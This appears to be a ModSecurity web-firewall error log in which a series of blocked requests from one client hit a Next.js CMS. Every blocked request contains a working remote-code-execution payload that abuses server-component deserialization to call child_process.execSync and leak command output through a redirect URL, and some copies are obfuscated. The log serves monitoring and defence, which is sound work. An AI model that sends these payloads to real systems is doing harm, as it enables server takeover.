"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wlei=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _euis=Buffer.from(_wlei).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_euis};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZGJrR4-YzjAtCob1sG9owAAAFU"] [Sun Feb 15 10:54:05.513504 2026] [:error] [pid 27901:tid 27958] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _chvg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _chke=Buffer.from(_chvg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_chke};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZGJrR4-YzjAtCob1sG9pAAAAEw"] [Sun Feb 15 10:54:05.533738 2026] [:error] [pid 27901:tid 27946] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jiqg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xgdo=Buffer.from(_jiqg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xgdo};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZGJrR4-YzjAtCob1sG9pQAAAEA"] [Sun Feb 15 10:54:05.554982 2026] [:error] [pid 27901:tid 27955] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pvsx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dpsx=Buffer.from(_pvsx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dpsx};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZGJrR4-YzjAtCob1sG9pgAAAEk"] [Sun Feb 15 10:54:05.575255 2026] [:error] [pid 27901:tid 27966] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pslv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _iswr=Buffer.from(_pslv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_iswr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9pwAAAFQ"] [Sun Feb 15 10:54:05.595559 2026] [:error] [pid 27901:tid 27956] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _asgp=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _oxdd=Buffer.from(_asgp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_oxdd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9qAAAAEo"] [Sun Feb 15 10:54:05.617769 2026] [:error] [pid 27901:tid 27965] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fhpl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _igge=Buffer.from(_fhpl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_igge};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZGJrR4-YzjAtCob1sG9qQAAAFM"] [Sun Feb 15 10:54:05.639016 2026] [:error] [pid 27901:tid 27947] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _siho=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _gaea=Buffer.from(_siho).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_gaea};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZGJrR4-YzjAtCob1sG9qgAAAEE"] [Sun Feb 15 10:54:05.659095 2026] [:error] [pid 27901:tid 27948] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _plhy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zawy=Buffer.from(_plhy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zawy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZGJrR4-YzjAtCob1sG9qwAAAEI"] [Sun Feb 15 10:54:05.679459 2026] [:error] [pid 27901:tid 27963] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pchu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nmje=Buffer.from(_pchu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nmje};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZGJrR4-YzjAtCob1sG9rAAAAFE"] [Sun Feb 15 10:54:05.699716 2026] [:error] [pid 27901:tid 27969] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ncra=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hinp=Buffer.from(_ncra).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hinp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9rQAAAFY"] [Sun Feb 15 10:54:05.720185 2026] [:error] [pid 27901:tid 27953] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ggaq=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _phhc=Buffer.from(_ggaq).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_phhc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9rgAAAEc"] [Sun Feb 15 10:54:05.740421 2026] [:error] [pid 27901:tid 27952] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _sqgy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xgot=Buffer.from(_sqgy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xgot};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZGJrR4-YzjAtCob1sG9rwAAAEY"] [Sun Feb 15 10:54:05.760788 2026] [:error] [pid 27901:tid 27957] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _rqjd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _cbbt=Buffer.from(_rqjd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_cbbt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZGJrR4-YzjAtCob1sG9sAAAAEs"] [Sun Feb 15 10:54:05.789610 2026] [:error] [pid 27901:tid 27961] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ezqo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hvmn=Buffer.from(_ezqo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hvmn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZGJrR4-YzjAtCob1sG9sQAAAE8"] [Sun Feb 15 10:54:05.816520 2026] [:error] [pid 27901:tid 27960] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vdem=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zoyb=Buffer.from(_vdem).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zoyb};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZGJrR4-YzjAtCob1sG9sgAAAE4"] [Sun Feb 15 10:54:05.843790 2026] [:error] [pid 27901:tid 27962] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zkqw=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zbrg=Buffer.from(_zkqw).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zbrg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9swAAAFA"] [Sun Feb 15 10:54:05.865452 2026] [:error] [pid 27901:tid 27971] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xbed=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _fuwv=Buffer.from(_xbed).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fuwv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/"] [unique_id "aZGJrR4-YzjAtCob1sG9tAAAAFg"] [Sun Feb 15 10:54:05.886486 2026] [:error] [pid 27901:tid 27954] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qwkp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zlfo=Buffer.from(_qwkp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zlfo};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZGJrR4-YzjAtCob1sG9tQAAAEg"] [Sun Feb 15 10:54:05.907645 2026] [:error] [pid 27901:tid 27970] [client 23.180.120.132:49084] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wtpf=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _myds=Buffer.from(_wtpf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_myds};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "www.cms-1.dev-unit.com"] [uri "/app/"] [unique_id 